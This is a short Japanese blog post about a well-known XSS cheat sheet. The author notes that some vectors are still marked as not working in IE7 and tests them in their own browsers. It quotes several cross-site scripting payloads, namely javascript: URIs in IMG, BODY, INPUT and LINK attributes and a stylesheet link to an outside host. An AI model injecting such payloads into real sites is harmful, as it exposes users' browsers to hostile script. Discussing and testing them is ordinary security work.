XSS (Cross Site Scripting) Cheat Sheet
久々にせきゅりての話でも?
まあ、有名なCheat Sheetなのですが、IE7で動くのんが動かないことになったままずーっとなのが気になる。
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> などなど(列挙すんのたるい)
動かない場合と動く場合とであるのであれだけども……。下に同じファイルへのリンクを張ってみました。私の触れるいくつかの環境では確実に動くのですが、動かないIE7があったりするのかしらん?
動かないよ
動くよ
……そもそもこの挙動っておかしいですけど。
(動かないはずの方はLunascapeでみたら動いちゃったよ)